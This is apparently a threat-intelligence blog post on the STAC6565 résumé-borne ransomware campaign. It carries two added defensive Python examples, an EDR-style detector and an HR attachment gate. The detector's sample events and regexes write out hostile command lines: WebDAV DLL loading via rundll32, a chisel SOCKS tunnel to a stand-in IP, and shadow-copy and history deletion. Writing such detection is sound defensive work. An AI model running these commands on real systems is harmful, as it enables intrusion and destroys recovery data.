The Candidate Who Should Have Never Been Hired: STAC6565 Infiltrates Through Fake Job Applications

  • Javier Conejo del Cerro
  • 2 days ago
  • 3 min read

A resume arrives in the inbox of an HR manager in Vancouver. Polished design. Impressive experience. No red flags. A promising candidate worth interviewing.

Except—behind that document hides a professional cybercriminal operation.

STAC6565, with strong overlaps to the financial threat group Gold Blade (also known as RedCurl and Earth Kapre), has turned the job recruitment process into a covert infiltration channel. Using weaponized résumés uploaded to trusted job platforms like Indeed, JazzHR, and ADP WorkforceNow, they smuggle QWCrypt ransomware into corporate systems, especially in Canada, where nearly 80% of known attacks are focused.

The attackers pretend to be applicants seeking an opportunity. But what they truly want is to steal corporate data first and encrypt everything later.

The candidate gets the job.

The company gets compromised.


Phase 1: Profiling the Target — Canada Under Surveillance


Since late 2018, this threat cluster has steadily expanded from initial operations in Russia to multiple regions. Yet the current campaign is different: the overwhelming majority of intrusions strike Canada.

This precise geographic focus suggests:

  • A client-driven hack-for-hire model

  • Targeting sectors where stolen business intelligence has high black-market value (services, NGOs, retail, manufacturing, transportation, technology)

STAC6565 is patient. Between February 2024 and August 2025, Sophos investigated nearly 40 intrusions—usually separated by dormant periods that allow the threat actor to refresh and refine their tradecraft before the next attack wave begins.

Their reputation is no longer espionage-only. They blend stealthy data theft with high-impact ransomware extortion.


Phase 2: The Job Application — Weaponized Résumés Go Through HR


The operation begins by impersonating job applicants.

The email looks legitimate. The résumé comes from real job platforms, not unknown domains.

Recruitment workflows make the perfect smuggling path:

  • HR staff must open résumés

  • Attachments look normal

  • Job platforms bypass traditional spam filters

  • Disposable emails enhance evasion

  • The psychological pressure to answer candidates quickly increases human error

Cybercriminals don’t need to trick the user.

The platform does it for them.


Phase 3: The Initial Dropper — Clicking Isn’t Necessary


Once opened, the fake CV performs a silent redirect to a booby-trapped URL.

This triggers the RedLoader chain, which progressively escalates access:

  1. Collect host info

  2. Query Active Directory structures

  3. Inventory installed software and defenses

  4. Establish covert communications through reverse proxies (RPivot, Chisel SOCKS5)

  5. Download next-stage payloads from attacker-controlled WebDAV infrastructure

Each intrusion is tailored.

Each resume is a unique trojan cargo.


Phase 4: Borrowing Windows Tools — A Fileless Killing Chain


RedLoader abuses legitimate executables and services such as:

  • rundll32.exe for DLL sideloading

  • Program Compatibility Assistant (pcalua.exe) for stealth execution

  • ADNotificationManager.exe renamed for confusion

  • Cloudflare Workers hosting infrastructure

When needed, the attackers take down defenses first.

They use Bring Your Own Vulnerable Driver (BYOVD) tactics:

  • A signed Zemana AntiMalware driver is weaponized

  • Antivirus and EDR processes are terminated

  • The rest of the operation proceeds undetected

Everything feels routine to the system.

Everything is rotten underneath.


Phase 5: The Final Stage — QWCrypt Ransomware Deployment


Only once the value of the stolen data is clear does the operation escalate.

QWCrypt:

  • Is customized per organization

  • Contains victim-specific identifiers

  • Targets hypervisors directly (ESXi)

  • Disables recovery mechanisms

  • Deletes PowerShell history and volume shadow copies

  • Encrypts virtual machine volumes and endpoints in parallel
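The telemetry side of Phases 3 to 5, as an added example that is not from the original post or from Sophos: a small rule set run over Sysmon/EDR-style process-creation events. It flags a document reader spawning a LOLBin, rundll32 or regsvr32 loading a DLL from a WebDAV path or a user-writable directory, pcalua.exe used as a launcher, shadow-copy and PowerShell-history deletion, and the Chisel/RPivot SOCKS tooling. The hostnames, paths and command lines are constructed for illustration, and the regexes describe the generic tooling rather than indicators published for this cluster.

```python
import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record (Sysmon event 1 / EDR style), constructed for this example."""
    host: str
    parent_image: str
    image: str
    cmdline: str


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    evidence: str


# A resume viewer should render a document, never spawn a script host or LOLBin.
DOC_READERS = {"winword.exe", "excel.exe", "acrord32.exe", "acrobat.exe",
               "msedge.exe", "chrome.exe", "outlook.exe"}
LOLBIN_HOSTS = {"rundll32.exe", "regsvr32.exe", "pcalua.exe", "mshta.exe", "powershell.exe",
                "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "msiexec.exe"}

# WebDAV redirector syntax (\\host@SSL@443\DavWWWRoot\...) or a bare URL handed to a LOLBin.
WEBDAV_RE = re.compile(r"\\\\[\w.-]+@(?:ssl@)?\d{1,5}\\|davwwwroot|https?://", re.I)
# Payload staged in a user-writable directory instead of System32 / Program Files.
USER_WRITABLE_RE = re.compile(r"\\(?:appdata|temp|tmp|downloads|public|programdata)\\", re.I)
# Recovery tampering and anti-forensics: shadow copies, boot recovery, PowerShell history.
RECOVERY_TAMPER_RE = re.compile(
    r"vssadmin(?:\.exe)?\s+delete\s+shadows"
    r"|wmic(?:\.exe)?\s+shadowcopy\s+delete"
    r"|bcdedit(?:\.exe)?\b.*recoveryenabled\s+no"
    r"|wbadmin(?:\.exe)?\s+delete\s+catalog"
    r"|consolehost_history"
    r"|clear-history",
    re.I,
)
# SOCKS pivot tooling named in Phase 3; name-based, so a renamed binary evades it.
PIVOT_RE = re.compile(r"\brpivot\b|\bchisel\b.*\bclient\b", re.I)


def base(path: str) -> str:
    """Lower-case file name from a Windows path, tolerating quotes and forward slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def rule_reader_spawns_lolbin(e):
    if base(e.parent_image) in DOC_READERS and base(e.image) in LOLBIN_HOSTS:
        return f"{base(e.parent_image)} -> {base(e.image)}"


def rule_dll_host_loads_remote_or_staged(e):
    if base(e.image) in {"rundll32.exe", "regsvr32.exe"} and (
            WEBDAV_RE.search(e.cmdline) or USER_WRITABLE_RE.search(e.cmdline)):
        return e.cmdline


def rule_pcalua_launcher(e):
    # "pcalua.exe -a <program>" starts <program> under the Program Compatibility Assistant.
    if base(e.image) == "pcalua.exe" and re.search(r"(?:^|\s)-a\s", e.cmdline):
        return e.cmdline


def rule_recovery_tamper(e):
    m = RECOVERY_TAMPER_RE.search(e.cmdline)
    return m.group(0) if m else None


def rule_socks_pivot(e):
    m = PIVOT_RE.search(e.cmdline)
    return m.group(0) if m else None


RULES = [rule_reader_spawns_lolbin, rule_dll_host_loads_remote_or_staged,
         rule_pcalua_launcher, rule_recovery_tamper, rule_socks_pivot]


def scan(events):
    """Run every rule over every event; one Finding per (event, rule) hit."""
    return [Finding(e.host, fn.__name__, hit)
            for e in events for fn in RULES if (hit := fn(e))]


def findings_per_host(findings):
    return dict(Counter(f.host for f in findings))


SAMPLE_EVENTS = [  # constructed sample telemetry; 203.0.113.10 is a documentation address
    ProcessEvent("HR-WS-01", r"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe",
                 r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe \\203.0.113.10@SSL@443\DavWWWRoot\cv\render.dll,Start"),
    ProcessEvent("HR-WS-01", r"C:\Windows\System32\rundll32.exe", r"C:\Windows\System32\pcalua.exe",
                 r"pcalua.exe -a C:\Users\hr\AppData\Local\Temp\ADNotificationManager.exe"),
    ProcessEvent("HR-WS-01", r"C:\Windows\System32\cmd.exe", r"C:\Users\Public\chisel.exe",
                 r"chisel.exe client https://203.0.113.10:443 R:socks"),
    ProcessEvent("HYP-MGMT-02", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\vssadmin.exe",
                 r"vssadmin.exe delete shadows /all /quiet"),
    ProcessEvent("HYP-MGMT-02", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'powershell.exe -nop -c "Remove-Item $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"'),
    # Benign: a Control Panel applet via rundll32, and HR opening a resume normally.
    ProcessEvent("FIN-WS-07", r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
    ProcessEvent("HR-WS-01", r"C:\Windows\explorer.exe",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" "C:\Users\hr\Downloads\cv.docx"'),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.host:12} {f.rule:38} {f.evidence}")
```

The parent-child rule carries the most weight in this chain: a PDF or Word viewer that spawns rundll32, pcalua or PowerShell is rare in normal HR work, so it can be alerted on at high confidence, while the command-line rules need the usual tuning against backup and administration scripts that legitimately touch shadow copies.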

Some attacks even show a five-day pause between data exfiltration and encryption attempts — a sign of monetization negotiation, or waiting for the right moment to maximize damage.

The job interview was a trap.

The locker was always the goal.


Victims: The People Who Only Wanted to Hire


Employees in HR and recruiting teams are high-value targets, yet rarely considered frontline defenders.

They are:

  • Granted access to internal systems

  • Trusted to receive external files daily

  • Overloaded with volume and deadlines

This campaign proves that the weakest link isn’t ignorance —

it’s a workflow that attackers can manipulate.

STAC6565 weaponizes business productivity against the business itself.


STAC6565 has redefined ransomware intrusion by merging:

  • Corporate espionage (steal first)

  • Operational extortion (encrypt later)

  • Job portal infiltration (instant access)

  • Infrastructure targeting (hypervisors + AD)

  • Tradecraft upgrades after every spike

No zero-day exploits.

No fake brands.

No malware emails dumped into spam.

Just a résumé that looks perfect.


Defensive Imperatives


Organizations must:

  • Lock down HR workflows to block risky file types and unknown shortcuts

  • Apply MFA and network segmentation to hypervisor and AD management planes

  • Detect suspicious WebDAV and PowerShell execution patterns

  • Assume that recruitment activity is a critical attack vector
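One way to implement the first bullet, locking the HR intake path to a short list of document types and rejecting shortcuts and extension games, as an added example that is not from the original post: an attachment gate that checks the extension allowlist, double extensions such as cv.pdf.lnk, the header bytes against the claimed type, auto-opening URL or script actions in PDFs (the silent redirect of Phase 3), and external relationships in .docx packages. The allowlist, file names and sample documents are assumptions constructed for this example.

```python
import io
import re
import zipfile
from dataclasses import dataclass

# Types an HR intake pipeline has a business reason to accept (policy assumption for this example).
ALLOWED = {"pdf", "docx", "doc", "rtf", "txt"}
# Header bytes each allowed type must start with; a mismatch means the extension is lying.
MAGIC = {
    "pdf": b"%PDF-",
    "docx": b"PK\x03\x04",
    "doc": b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1",
    "rtf": b"{\\rtf",
}
# PDF features that let a document act on open: launch a program, run script, follow a URL.
PDF_ACTIVE = [
    (re.compile(rb"/Launch"), "PDF contains a /Launch action"),
    (re.compile(rb"/JavaScript|/JS\b"), "PDF contains JavaScript"),
    (re.compile(rb"/OpenAction[\s\S]{0,200}?/URI"), "PDF opens a URL automatically (/OpenAction with /URI)"),
]


@dataclass(frozen=True)
class Verdict:
    accepted: bool
    reasons: tuple


def inspect_attachment(filename: str, data: bytes) -> Verdict:
    """Gate one uploaded file; empty reasons means it may proceed to the next control."""
    reasons = []
    exts = filename.lower().split(".")[1:]
    final = exts[-1] if exts else ""
    if final not in ALLOWED:
        reasons.append(f"file type .{final or '(none)'} is not on the HR intake allowlist")
    # cv.pdf.lnk: an inner document extension hides the real type from the reader.
    if len(exts) > 1 and any(x in ALLOWED for x in exts[:-1]):
        reasons.append("double extension: " + ".".join(exts))
    expected = MAGIC.get(final)
    if expected and not data.startswith(expected):
        reasons.append(f"content does not match a .{final} header")
    elif final == "pdf":
        reasons.extend(why for pattern, why in PDF_ACTIVE if pattern.search(data))
    elif final == "docx":
        reasons.extend(_docx_findings(data))
    return Verdict(accepted=not reasons, reasons=tuple(reasons))


def _docx_findings(data: bytes):
    out = []
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            for name in z.namelist():
                # Relationship parts pointing outside the package fetch content on open.
                if name.endswith(".rels") and b'TargetMode="External"' in z.read(name):
                    out.append(f"{name} references external content (remote template or link)")
                if name.lower().endswith("vbaproject.bin"):
                    out.append("embedded VBA project in a .docx")
    except zipfile.BadZipFile:
        out.append("not a valid OOXML package")
    return out


def build_docx(rels_xml: str) -> bytes:
    """Minimal .docx-shaped package, constructed for the sample inputs below."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/_rels/settings.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed sample documents; example.invalid is a reserved, non-resolving name.
CLEAN_PDF = b"%PDF-1.7\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n%%EOF"
REDIRECT_PDF = (b"%PDF-1.7\n1 0 obj << /Type /Catalog "
                b"/OpenAction << /S /URI /URI (https://example.invalid/cv) >> >> endobj\n%%EOF")
SHORTCUT = b"L\x00\x00\x00\x01\x14\x02\x00" + b"\x00" * 8
LOCAL_RELS = '<Relationships><Relationship Id="rId1" Target="styles.xml"/></Relationships>'
EXTERNAL_RELS = ('<Relationships><Relationship Id="rId1" Type="attachedTemplate" '
                 'Target="https://example.invalid/t.dotm" TargetMode="External"/></Relationships>')

if __name__ == "__main__":
    samples = [("Javier_Resume.pdf", CLEAN_PDF), ("CV_Final.pdf", REDIRECT_PDF),
               ("Resume.pdf.lnk", SHORTCUT), ("Resume.docx", build_docx(EXTERNAL_RELS)),
               ("Resume.docx", build_docx(LOCAL_RELS)), ("Resume.pdf", build_docx(LOCAL_RELS))]
    for name, data in samples:
        v = inspect_attachment(name, data)
        print(f"{name:18} {'ACCEPT' if v.accepted else 'REJECT'} {'; '.join(v.reasons)}")
```

This is a first-pass gate, not a verdict: PDF object streams can be compressed, which hides these keywords from a byte scan, so anything that passes should still go through detonation or content disarm before an HR workstation renders it.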

Because when the candidate looks too good to be true…

They might be the one preparing to fire everyone.



The Hacker News